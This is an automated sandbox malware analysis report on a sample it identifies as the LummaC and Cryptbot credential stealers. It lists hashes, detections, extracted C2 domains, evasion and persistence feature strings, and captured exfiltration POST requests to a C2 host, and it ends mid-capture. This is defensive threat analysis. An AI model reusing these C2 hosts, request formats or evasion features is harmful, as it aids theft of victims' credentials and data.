Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jo0PnKm2Lg.exe

Overview

General Information

Sample name:jo0PnKm2Lg.exe
renamed because original name is a hash value
Original sample name:8398fc4aa3a5a5ab6ae7ed394b449d0a.exe
Analysis ID:1589511
MD5:8398fc4aa3a5a5ab6ae7ed394b449d0a
SHA1:820ce4bb8eb51e31effa41e6829e84089b728760
SHA256:f25fab3f64bad2cd989035dd854b761fe06b97e76291bd180991d21d91ea5c22
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Cryptbot, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Leaks process information
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • jo0PnKm2Lg.exe (PID: 3580 cmdline: "C:\Users\user\Desktop\jo0PnKm2Lg.exe" MD5: 8398FC4AA3A5A5AB6AE7ED394B449D0A)
    • LummaC2.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 8DA89B163D506BE4A73B987517A1B9E4)
    • Set-up.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 53D48938C0EC850EB316CF433ECFC045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: LummaC

{"C2 url": ["nearycrepso.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "cloudewahsj.shop", "rabidcowse.shop", "berserkyfir.click", "abruptyopsn.shop"], "Build id": "MeHdy4--pl14vs02"}

Threatname: Cryptbot

{"C2 list": ["home.twelve12vs.top", "twelve12vs.top", "a.dnspod.comvs.top", "gPhome.twelve12vs.top", "twelve12vse12vs.top", "twelve12vs.top.top"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
jo0PnKm2Lg.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
  • 0x7df0d1:$s1: Runner
  • 0x7df236:$s3: RunOnStartup
  • 0x7df0e5:$a1: Antis
  • 0x7df112:$a2: antiVM
  • 0x7df119:$a3: antiSandbox
  • 0x7df125:$a4: antiDebug
  • 0x7df12f:$a5: antiEmulator
  • 0x7df13c:$a6: enablePersistence
  • 0x7df14e:$a7: enableFakeError
  • 0x7df25f:$a8: DetectVirtualMachine
  • 0x7df284:$a9: DetectSandboxie
  • 0x7df2af:$a10: DetectDebugger
  • 0x7df2be:$a11: CheckEmulator

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Set-up.exe PID: 3128JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.0.jo0PnKm2Lg.exe.950000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
      • 0x7df0d1:$s1: Runner
      • 0x7df236:$s3: RunOnStartup
      • 0x7df0e5:$a1: Antis
      • 0x7df112:$a2: antiVM
      • 0x7df119:$a3: antiSandbox
      • 0x7df125:$a4: antiDebug
      • 0x7df12f:$a5: antiEmulator
      • 0x7df13c:$a6: enablePersistence
      • 0x7df14e:$a7: enableFakeError
      • 0x7df25f:$a8: DetectVirtualMachine
      • 0x7df284:$a9: DetectSandboxie
      • 0x7df2af:$a10: DetectDebugger
      • 0x7df2be:$a11: CheckEmulator

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-12T17:45:21.989992+010020590181A Network Trojan was detected192.168.2.549723176.53.147.10480TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: jo0PnKm2Lg.exeAvira: detected
      Antivirus detection for URL or domain
      Source: gPhome.twelve12vs.topAvira URL Cloud: Label: malware
      Source: berserkyfir.clickAvira URL Cloud: Label: malware
      Source: twelve12vs.topAvira URL Cloud: Label: malware
      Source: home.twelve12vs.topAvira URL Cloud: Label: malware
      Found malware configuration
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "noisycuttej.shop", "cloudewahsj.shop", "rabidcowse.shop", "berserkyfir.click", "abruptyopsn.shop"], "Build id": "MeHdy4--pl14vs02"}
      Source: Set-up.exe.3128.3.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["home.twelve12vs.top", "twelve12vs.top", "a.dnspod.comvs.top", "gPhome.twelve12vs.top", "twelve12vse12vs.top", "twelve12vs.top.top"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeReversingLabs: Detection: 68%
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeReversingLabs: Detection: 75%
      Multi AV Scanner detection for submitted file
      Source: jo0PnKm2Lg.exeReversingLabs: Detection: 76%
      Source: jo0PnKm2Lg.exeVirustotal: Detection: 69%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: jo0PnKm2Lg.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: rabidcowse.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: noisycuttej.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: framekgirus.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: wholersorie.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: nearycrepso.shop
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: berserkyfir.click
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000002.00000002.3421885892.000000000131A000.00000004.00000020.00020000.00000000.sdmpString decryptor: MeHdy4--pl14vs02
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4ba0d613-2
      Source: jo0PnKm2Lg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: jo0PnKm2Lg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00E32D3B
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+09h]2_2_00DF8730
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ebx, esp2_2_00E170D0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then jmp eax2_2_00E170D0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then xor byte ptr [esp+eax+01h], al2_2_00E198B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9B8995CDh2_2_00E2D860
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx esi, byte ptr [eax]2_2_00E34860
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, word ptr [eax]2_2_00E34860
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00E1D050
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00E08025
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, edi2_2_00DF9000
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then test esi, esi2_2_00E2E9E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_00E311E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h2_2_00E0C9F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_00E072C9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00DF92F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00DF92F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00E21AB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00E0C270
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ebx, esp2_2_00E17250
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then jmp eax2_2_00E17250
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00E11BF0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_00E1EBF0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00E20BF7
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then jmp eax2_2_00E33BB7
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001F0h]2_2_00DFEB5F
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov edx, eax2_2_00E18B70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then jmp eax2_2_00E33B70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, dword ptr [esi+3Ch]2_2_00E08B3B
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00E054C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [edx], cx2_2_00E054C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [edx], di2_2_00DFE4F3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov edx, esi2_2_00E2ECD9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+23h]2_2_00E2ECD9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-5650DC85h]2_2_00E2ECD9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, ebx2_2_00E1CCB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h2_2_00E1BC9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00E1BC9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+03h]2_2_00E33C60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then inc eax2_2_00E33C60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00E2A470
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00E06444
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp dword ptr [edi+ecx*8], F68AC6D1h2_2_00E06444
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+50h]2_2_00E19C30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-6282CB83h]2_2_00DFADD0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then inc eax2_2_00E33DC0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]2_2_00E0B5A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]2_2_00E20DB3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00E205B5
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov edx, ecx2_2_00E0A580
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h2_2_00E1BD9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00E1BD9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-5650DC85h]2_2_00E2F57A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00DF7540
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00DF7540
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-294BBCC4h]2_2_00E31D40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_00E0FD50
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]2_2_00E13500
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00E13500
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then inc eax2_2_00E33EA0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then push 869608D1h2_2_00E09EA4
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+38h]2_2_00DFBE59
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-72F9EF2Bh]2_2_00DFCE48
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ebx, esp2_2_00E16E20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then jmp eax2_2_00E16E20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00E34780
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h2_2_00E34780
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, ebp2_2_00DF97B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h2_2_00E1B770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov ecx, eax2_2_00E1B770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then inc eax2_2_00E33F40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53585096h2_2_00E18F30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_00E07703
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 4x nop then mov byte ptr [edi], al2_2_00E1FF19

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.5:49723 -> 176.53.147.104:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: nearycrepso.shop
      Source: Malware configuration extractorURLs: wholersorie.shop
      Source: Malware configuration extractorURLs: framekgirus.shop
      Source: Malware configuration extractorURLs: tirepublicerj.shop
      Source: Malware configuration extractorURLs: noisycuttej.shop
      Source: Malware configuration extractorURLs: cloudewahsj.shop
      Source: Malware configuration extractorURLs: rabidcowse.shop
      Source: Malware configuration extractorURLs: berserkyfir.click
      Source: Malware configuration extractorURLs: abruptyopsn.shop
      Source: Malware configuration extractorURLs: home.twelve12vs.top
      Source: Malware configuration extractorURLs: twelve12vs.top
      Source: Malware configuration extractorURLs: a.dnspod.comvs.top
      Source: Malware configuration extractorURLs: gPhome.twelve12vs.top
      Source: Malware configuration extractorURLs: twelve12vse12vs.top
      Source: Malware configuration extractorURLs: twelve12vs.top.top
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
      Source: global trafficHTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1Host: home.twelve12vs.topAccept: */*Content-Type: application/jsonContent-Length: 529138Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
      Source: global trafficHTTP traffic detected: GET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1Host: home.twelve12vs.topAccept: */*
      Source: global trafficHTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1Host: home.twelve12vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
      Source: Joe Sandbox ViewASN Name: VANNINVENTURESGB VANNINVENTURESGB
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
      Source: global trafficHTTP traffic detected: GET /AvWHJxAVCxPehbRictmJ1736163220?argument=0 HTTP/1.1Host: home.twelve12vs.topAccept: */*
      Source: global trafficDNS traffic detected: DNS query: httpbin.org
      Source: global trafficDNS traffic detected: DNS query: home.twelve12vs.top
      Source: unknownHTTP traffic detected: POST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1Host: home.twelve12vs.topAccept: */*Content-Type: application/jsonContent-Length: 529138Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 38 37 35 35 35 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 